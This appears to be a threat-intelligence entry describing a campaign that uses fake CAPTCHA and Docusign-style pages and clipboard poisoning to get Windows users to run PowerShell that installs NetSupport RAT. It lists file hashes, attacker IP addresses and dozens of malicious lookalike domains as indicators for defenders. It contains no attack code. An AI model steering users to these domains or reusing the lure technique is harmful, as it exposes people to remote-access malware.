How Threat Actors Exploit Human Trust: A Breakdown of the 'Prove You Are Human' Malware Scheme

June 5, 2025, 10 p.m.

Description

A malicious campaign exploits user trust through deceptive websites, including spoofed Gitcodes and fake Docusign verification pages. Victims are tricked into running malicious PowerShell scripts on their Windows machines, leading to the installation of NetSupport RAT. The multi-stage attack uses clipboard poisoning and fake CAPTCHAs to deliver the malware. The campaign involves multiple domains, uses ROT13 encoding, and creates persistent infections. Similar techniques were observed in other spoofed content, including Okta and popular media apps. The attack capitalizes on user familiarity with common online interactions, emphasizing the need for vigilance and skepticism in online activities.

External References

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/Prove-You-Are-Human.csv
https://dti.domaintools.com/how-threat-actors-exploit-human-trust
https://otx.alienvault.com/pulse/684209ff0c889eabbed70e8b
Tags
social engineering
netsupport rat
captcha
2025-06-05
clipboard poisoning
gitcodes

Date

  • Created: June 5, 2025, 9:19 p.m.
  • Published: June 5, 2025, 9:19 p.m.
  • Modified: June 5, 2025, 10 p.m.

Indicators

  • a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d
  • 3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7
  • 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd
  • f9a241a768397efb4b43924fbd32186fcb1c88716fff3085d3ddcdd322d3404f
  • d7fadf7ef45c475bd9a759a771d99ccf95edfa8a0c101ce2439a07b66c2e5c72
  • e9fe19455642673b14c77d18a1e7ed925f23906bf11237dfafd7fb2cba1f666d
  • c6907acabf2edf0be959c64a434e101963f7c18dcf79f116e0ce6b5ced5dd08c
  • b2daa2b5afb389828e088ec8b27c0636bdad94b2ef71dcf8034ee601cb60d8d6
  • b258de3b7ef42b4f4bfb0fb5ffe7c55df6aef01cc591abe34a70d1ff82130cd5
  • b3e879b5952988fb0c656240365db8f01198f9d83cd2a3ec0e2a8ee172e20a11
  • ab8fdde9fb9b88c400c737d460dcbf559648dc2768981bdd68f55e1f98292c2a
  • 8ffacc942d1c3f45e797369a1f4cbd5dcd84372abf979b06220236d5a5cea649
  • 89043d2817d1bb4cb57ed939823dca0af9ae412655a6c75c694cb13d088efe5a
  • 58874c0dc26a78cdc058f84af9967f31b3c43173edc7515fa400e6ef8386205f
  • 80b274871e5024dfa9e513219fe3df82cc8fe4255010bd5d04d23d5833962c10
  • 431b0b19239fc5e0eeaee70cd6e807868142e8cd0b2b6b1bd4a7a2cc8eb57d15
  • 1a128f6748d71d02c72ba51268be181143405830a4e48dfa53bf3d6ed3391211
  • 07576e1db7e7bd0f7d2c54b6749fdd73c72dba8c2ba8ab110b305cfc10c93c80
  • 194.26.232.180
  • 95.215.204.156
  • 91.211.249.44
  • 185.209.21.241
  • 212.86.115.52
  • tradingviewtradingview.dev
  • tradingviewtoolz.com
  • tradingviewtool.com
  • tradingviewbeta.dev
  • tradingviewdev.com
  • tradingviewindicator.dev
  • tradingview-beta.dev
  • tradingviewai.dev
  • tradingview-ai.dev
  • pastefy.net
  • pastefy.pro
  • pastefy.com
  • pasteco.com
  • modedeveloper.com
  • modedevs.ai
  • modedev.ai
  • modedeveloper.ai
  • mhousecreative.com
  • loyalcompany.net
  • hubofnotion.com
  • jeffsorsonblog.dev
  • givcodes.com
  • gitcodes.org
  • gitpaste.com
  • gitcodes.net
  • gitcodes.io
  • devtradingview.net
  • devtradingview.ai
  • devmode-beta.dev
  • devmodebeta.dev
  • developerbeta.dev
  • developer-update.dev
  • developer-package.dev
  • developer-mode.dev
  • developer-beta.dev
  • developer-ai.dev
  • devchart.ai
  • devbetabeta.dev
  • dev-update.dev
  • dev-beta.com
  • codepaste.io
  • dans-lupta.xyz
  • charts-beta.dev
  • betatradingview.dev
  • betamodetradingview.dev
  • battalia-dansului.com
  • batalia-dansului.xyz
  • aitradingview.dev
  • 0xpaste.com
Download all indicators here!

Attack Patterns

  • NetSupport RAT